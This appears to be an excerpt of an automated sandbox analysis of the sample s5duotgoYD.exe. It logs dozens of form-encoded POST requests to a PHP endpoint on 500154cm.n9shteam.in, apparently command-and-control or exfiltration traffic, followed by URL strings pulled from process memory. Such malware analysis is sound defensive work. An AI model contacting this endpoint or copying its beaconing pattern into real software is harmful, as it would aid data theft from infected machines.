                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 1840Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 1820Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 1828Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2504Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2500Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 1840Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 1840Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 1840Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 1840Expect: 100-continueConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 | Host: 500154cm.n9shteam.in | Content-Length: 2512 | Expect: 100-continue
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: 500154cm.n9shteam.in
Source: unknown | HTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 | Host: 500154cm.n9shteam.in | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
Source: powershell.exe, 0000001B.00000002.1897890945.00000297C7390000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.v
Source: svchost.exe, 00000034.00000003.1866084978.00000257292C8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.52.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: svchost.exe, 00000034.00000003.1866084978.00000257292C8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: qmgr.db.52.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.52.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000034.00000003.1866084978.00000257292C8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.52.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000034.00000003.1866084978.00000257292C8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.52.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000034.00000003.1866084978.00000257292FD000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.52.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.52.dr | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000016.00000002.3045203135.000001B890078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3239915515.000001F66EA28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3090748741.000001F2B1C48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3078390875.0000025A50FA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.3141047160.00000234E2CD8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000001E.00000002.1866487790.00000234D2E89000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000016.00000002.1851720872.000001B880228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1923272794.000001F65EBD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1864937137.000001F2A1DF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1911427610.00000297C7708000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1894522833.0000025A41158000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1866487790.00000234D2E89000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: s5duotgoYD.exe, 00000000.00000002.1759280751.00000000032A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1851720872.000001B880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1923272794.000001F65E9B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1864937137.000001F2A1BD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1911427610.00000297C74E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1894522833.0000025A40F31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1866487790.00000234D2C61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000016.00000002.1851720872.000001B880228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1923272794.000001F65EBD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1864937137.000001F2A1DF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1911427610.00000297C7708000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1894522833.0000025A41158000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1866487790.00000234D2E89000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000001E.00000002.1866487790.00000234D2E89000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: RuntimeBroker.exe, 00000029.00000002.2602749504.0000000003351000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.w3.
Source: gbwNxijWjo.49.dr, bbxeI3ug9M.49.dr, hubwaq2wy1.49.dr, nhUVWLiLPL.49.dr, 6AXfZkxDXl.49.dr, KLkhMHbGp2.49.dr, TFBbevwxIk.49.dr, YExdYK4pNu.49.dr, Wo4oAorrdG.49.dr, gDJJVxfQjK.49.dr, HKnRc8XHjH.49.dr, E9KeadD3yn.49.dr, rrqafllUeS.49.dr, 0BresBxHuN.49.dr, 5VMx1UwrKG.49.dr, qHbgtTAXCA.49.dr, dPqhjTyRx1.49.dr, igsPGqoyPx.49.dr, tjtCnMU4xK.49.dr, OtHSxTXITh.49.dr, lTLd0ET4Bv.49.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000016.00000002.1851720872.000001B880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1923272794.000001F65E9B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1864937137.000001F2A1BD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1911427610.00000297C74E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1894522833.0000025A40F31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1866487790.00000234D2C61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: gbwNxijWjo.49.dr, bbxeI3ug9M.49.dr, hubwaq2wy1.49.dr, nhUVWLiLPL.49.dr, 6AXfZkxDXl.49.dr, KLkhMHbGp2.49.dr, TFBbevwxIk.49.dr, YExdYK4pNu.49.dr, Wo4oAorrdG.49.dr, gDJJVxfQjK.49.dr, HKnRc8XHjH.49.dr, E9KeadD3yn.49.dr, rrqafllUeS.49.dr, 0BresBxHuN.49.dr, 5VMx1UwrKG.49.dr, qHbgtTAXCA.49.dr, dPqhjTyRx1.49.dr, igsPGqoyPx.49.dr, tjtCnMU4xK.49.dr, OtHSxTXITh.49.dr, lTLd0ET4Bv.49.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: gbwNxijWjo.49.dr, bbxeI3ug9M.49.dr, hubwaq2wy1.49.dr, nhUVWLiLPL.49.dr, 6AXfZkxDXl.49.dr, KLkhMHbGp2.49.dr, TFBbevwxIk.49.dr, YExdYK4pNu.49.dr, Wo4oAorrdG.49.dr, gDJJVxfQjK.49.dr, HKnRc8XHjH.49.dr, E9KeadD3yn.49.dr, rrqafllUeS.49.dr, 0BresBxHuN.49.dr, 5VMx1UwrKG.49.dr, qHbgtTAXCA.49.dr, dPqhjTyRx1.49.dr, igsPGqoyPx.49.dr, tjtCnMU4xK.49.dr, OtHSxTXITh.49.dr, lTLd0ET4Bv.49.dr | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: gbwNxijWjo.49.dr, bbxeI3ug9M.49.dr, hubwaq2wy1.49.dr, nhUVWLiLPL.49.dr, 6AXfZkxDXl.49.dr, KLkhMHbGp2.49.dr, TFBbevwxIk.49.dr, YExdYK4pNu.49.dr, Wo4oAorrdG.49.dr, gDJJVxfQjK.49.dr, HKnRc8XHjH.49.dr, E9KeadD3yn.49.dr, rrqafllUeS.49.dr, 0BresBxHuN.49.dr, 5VMx1UwrKG.49.dr, qHbgtTAXCA.49.dr, dPqhjTyRx1.49.dr, igsPGqoyPx.49.dr, tjtCnMU4xK.49.dr, OtHSxTXITh.49.dr, lTLd0ET4Bv.49.dr | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 0000001E.00000002.3141047160.00000234E2CD8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001E.00000002.3141047160.00000234E2CD8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001E.00000002.3141047160.00000234E2CD8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: gbwNxijWjo.49.dr, bbxeI3ug9M.49.dr, hubwaq2wy1.49.dr, nhUVWLiLPL.49.dr, 6AXfZkxDXl.49.dr, KLkhMHbGp2.49.dr, TFBbevwxIk.49.dr, YExdYK4pNu.49.dr, Wo4oAorrdG.49.dr, gDJJVxfQjK.49.dr, HKnRc8XHjH.49.dr, E9KeadD3yn.49.dr, rrqafllUeS.49.dr, 0BresBxHuN.49.dr, 5VMx1UwrKG.49.dr, qHbgtTAXCA.49.dr, dPqhjTyRx1.49.dr, igsPGqoyPx.49.dr, tjtCnMU4xK.49.dr, OtHSxTXITh.49.dr, lTLd0ET4Bv.49.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: gbwNxijWjo.49.dr, bbxeI3ug9M.49.dr, hubwaq2wy1.49.dr, nhUVWLiLPL.49.dr, 6AXfZkxDXl.49.dr, KLkhMHbGp2.49.dr, TFBbevwxIk.49.dr, YExdYK4pNu.49.dr, Wo4oAorrdG.49.dr, gDJJVxfQjK.49.dr, HKnRc8XHjH.49.dr, E9KeadD3yn.49.dr, rrqafllUeS.49.dr, 0BresBxHuN.49.dr, 5VMx1UwrKG.49.dr, qHbgtTAXCA.49.dr, dPqhjTyRx1.49.dr, igsPGqoyPx.49.dr, tjtCnMU4xK.49.dr, OtHSxTXITh.49.dr, lTLd0ET4Bv.49.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: gbwNxijWjo.49.dr, bbxeI3ug9M.49.dr, hubwaq2wy1.49.dr, nhUVWLiLPL.49.dr, 6AXfZkxDXl.49.dr, KLkhMHbGp2.49.dr, TFBbevwxIk.49.dr, YExdYK4pNu.49.dr, Wo4oAorrdG.49.dr, gDJJVxfQjK.49.dr, HKnRc8XHjH.49.dr, E9KeadD3yn.49.dr, rrqafllUeS.49.dr, 0BresBxHuN.49.dr, 5VMx1UwrKG.49.dr, qHbgtTAXCA.49.dr, dPqhjTyRx1.49.dr, igsPGqoyPx.49.dr, tjtCnMU4xK.49.dr, OtHSxTXITh.49.dr, lTLd0ET4Bv.49.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: svchost.exe, 00000034.00000003.1866084978.0000025729372000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.52.dr | String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: svchost.exe, 00000034.00000003.1866084978.00000257293CA000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.52.dr | String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: svchost.exe, 00000034.00000003.1866084978.0000025729372000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.52.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: svchost.exe, 00000034.00000003.1866084978.0000025729353000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1866084978.0000025729398000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1866084978.00000257293B7000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.52.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000034.00000003.1866084978.0000025729372000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: powershell.exe, 0000001E.00000002.1866487790.00000234D2E89000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000016.00000002.3045203135.000001B890078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3239915515.000001F66EA28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3090748741.000001F2B1C48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3078390875.0000025A50FA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.3141047160.00000234E2CD8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000034.00000003.1866084978.0000025729372000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.52.dr | String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
